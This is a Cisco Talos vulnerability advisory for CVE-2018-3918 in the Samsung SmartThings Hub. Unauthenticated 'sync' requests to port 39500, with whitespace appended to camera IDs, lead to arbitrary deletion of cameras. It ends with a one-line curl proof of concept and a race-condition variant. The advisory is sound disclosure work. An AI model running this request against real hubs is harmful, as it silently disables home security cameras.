Talos Vulnerability Report

TALOS-2018-0582

Samsung SmartThings Hub hubCore port 39500 sync denial-of-service vulnerability

July 26, 2018
CVE Number

CVE-2018-3918

Summary

An exploitable vulnerability exists in the remote servers of Samsung SmartThings Hub. The hubCore process listens on port 39500 and relays any unauthenticated messages to SmartThings' remote servers, which incorrectly handle camera IDs for the "sync" operation, leading to arbitrary deletion of cameras. An attacker can send an HTTP request to trigger this vulnerability.

Tested Versions

Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17

Product URLs

https://shop.smartthings.com/products/samsung-smartthings-hub

CVSSv3 Score

6.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H

CWE

CWE-156: Improper Neutralization of Whitespace

Details

Samsung produces a series of devices aimed at controlling and monitoring a home, such as wall switches, LED bulbs, thermostats and cameras. One of those is the Samsung SmartThings Hub, a central controller that allows an end user to use their smartphone to connect to their house remotely and operate other devices through it. The hub board utilizes several systems on chips. The firmware in question is executed by an i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A architecture.

The firmware is Linux-based, and runs a series of daemons that interface with devices nearby via ethernet, ZigBee, Z-Wave and Bluetooth protocols. Additionally, the hubCore process is responsible for communicating with the remote SmartThings servers via a persistent TLS connection. These servers act as a bridge that allows for secure communication between the smartphone application and the hub. End users can simply install the SmartThings mobile application on their smartphone to control the hub remotely.

One of the features of the hub is that it connects to smart cameras, configures them and looks at their livestreams. For testing, we set up the Samsung SmartCam SNH-V6414BN on the hub. Once done, the livestream can be displayed by the smartphone application by connecting either to the remote SmartThings servers, or directly to the camera, if they're both in the same subnetwork.

Inside the hub, the livestream is handled by the video-core process, which uses ffmpeg to connect via RTSP to the smart camera in its same local network, and at the same time, provides a streamable link for the smartphone application.

The remote SmartThings servers have the possibility to communicate with the video-core process by sending messages in the persistent TLS connection, established by the hubCore process. These messages can encapsulate an HTTP request, which hubCore would relay directly to the HTTP server exposed by video-core. The HTTP server listens on port 3000, bound to the localhost address, so a local connection is needed to perform this request.

While analyzing the video-core process, we identified the following traffic on port 39500, generated by video-core when requesting the "/sync" path [1]:

[1] sync request
$ curl "http://127.0.0.1:3000/sync"

[2] video-core -> 127.0.0.1:39500 (hubCore)
POST /videocore HTTP/1.1
Host: 127.0.0.1:39500
Accept: */*
Content-Type: application/json
X-ST-Application: Video-Core
X-ST-Version: 1.5.3
Content-Length: 82

{"videoRequestType":"sync","cameraIds" : ["<camera-id1>", "<camera-id2>"]}

[3] hubCore -> SmartThings server (dc.connect.smartthings.com:443)
< sends a message embedding the HTTP request above >

[4] SmartThings server (dc.connect.smartthings.com:443) -> hubCore
< sends a message embedding the following HTTP response >
HTTP/1.1 202 ACCEPTED
Connection: close

[5] 127.0.0.1:39500 (hubCore) -> video-core
< forwards the HTTP response above >

The hubCore process listens on port 39500, bound to "0.0.0.0", and simply forwards the HTTP request [2] to the remote Samsung SmartThings servers [3], which answer with [4]. The answer is finally forwarded back to the client [5]. Note that being hubCore bound to "0.0.0.0", request [1] could be omitted and request [2] could be initiated by anyone in the network, without any prior authentication.

In essence, the "sync" request [1] is used to make sure that the remote servers and video-core's internal database are synchronized. All camera IDs known by video-core are included in the JSON string, and if video-core contains a camera-id which doesn't exist in the remote servers, it will be deleted. Continuing on the example, if camera-id2 is not found by the remote servers, the following traffic can be seen:

[6] SmartThings server (dc.connect.smartthings.com:443) -> hubCore
< sends a message embedding the following HTTP request >
DELETE /cameras/<camera-id2> HTTP/1.1
Accept: */*
User-Agent: Linux UPnP/1.0 SmartThings
Content-Type: application/json
Connection: Close
Host: 127.0.0.1:3000

[7] hubCore -> 127.0.0.1:3000 (video-core)
< forwards the HTTP request above >

[8] 127.0.0.1:3000 (video-core) -> hubCore
HTTP/1.1 204 No Content
Server: Video-Core
X-ST-Application: Video-Core
X-ST-Version: 1.5.3
Connection: close
Content-Length: 0

Request [6] is sent by the remote Samsung SmartThings servers over the persistent TLS connection, and is thus received by the hubCore process, which blindly forwards it to video-core's HTTP server on port 3000 [7]. Request [8] is simply the answer of video-core to the "DELETE" request.

To summarize, the flow of events when a deletion is going to take place is:

    |______Sender______|___________________Hub___________________|___SmartThings Servers___
    |                  |                                         |
[2] |  sync request ---|--> hubCore:39500                        |
    |  with JSON M1    |                                         |
[3] |                  |                         hubCore sends --|--> process JSON M1
    |                  |                         JSON M1         |
    |                  |                                         |
[4] |                  |                         hubCore      <--|--- send HTTP response
    |                  |                                         |    M2 (ACCEPTED)
[5] |    terminate  <--|--- hubCore:39500                        |
    |    connection    |    forwards M2                          |
    |                  |                                         |
[6] |                  |                         hubCore      <--|--- generate and send
    |                  |                                         |    HTTP request M3
    |                  |                    |                    |
[7] |                  | video-core:3000 <--|--- hubCore sends   |
    |                  |                    |    HTTP request M3 |
    |                  |                    |                    |
[8] |                  | video-core:3000 ---|--> hubCore         |
    |                  |                    |                    |

Where "Sender" can either be the hub itself (that is video-core, as shown in request [2]) or anyone in the network.

As we can see, a portion of request [2] is included in request [6]: the <camera-id2>. In fact, it is first present in message M1, and is then propagated till video-core where it is sent inside M3.

We noticed that the remote server does not strip whitespace characters appended to the <camera-id> values sent in M1. This causes the remote servers to fail, recognizing an existing camera, which in turn, initiates the deletion procedure for the requested camera ID. The <camera-id> will be inserted in M3 without modifications (that is, if it is still including any whitespace character), which will be discarded by video-core's HTTP server. Thus, by appending one or more spaces at the end of a valid camera ID, anyone would be able to delete a camera from the hub without authentication.

Moreover, note that if message M1 only contains camera IDs unknown to the remote servers, the denial of service would not be permanent and an attacker would need to send the "sync" message continuously. In fact, in this case remote servers, noticing that the the hub would have an empty camera list, will re-add all cameras known remotely by sending a "POST /cameras" request following request [8].

We found two different ways to avoid this:

  • Sending multiple "sync" requests in a short time could hit a race condition between the deletion and the creation of the camera. In this case, the creation request is discarded and the hub is left without any camera.
  • Sending the same camera ID twice in the same request, adding a space to the last camera ID. This will trick the servers into not sending the creation request because the hub is thought to still have a valid camera ID (the first one), while requesting for the deletion of the second camera ID (equal to the first one plus a whitespace). An example is shown in the proof of concept below.

Exploit Proof of Concept

The following proof of concept shows how to delete an arbitrary camera, given its "cameraId".

$ curl -i -X POST "http://${hubIP}:39500/videocore" -d '{"videoRequestType":"sync","cameraIds" : ["'${sCameraId}'", "'${sCameraId}' "]}'

The request received by video-core is:

DELETE /cameras/<cameraId>  HTTP/1.1
Accept: */*
User-Agent: Linux UPnP/1.0 SmartThings
Content-Type: application/json
Connection: Close
Host: 127.0.0.1:3000

Notice the additional space between the camera ID and the "HTTP/1.1" string, which will be discarded by the HTTP server.

Timeline

2018-04-25 - Vendor Disclosure
2018-05-23 - Discussion with vendor/review of timeline for disclosure
2018-07-17 - Vendor patched
2018-07-26 - Public Release

Credit

Discovered by Claudio Bozzato of Cisco Talos.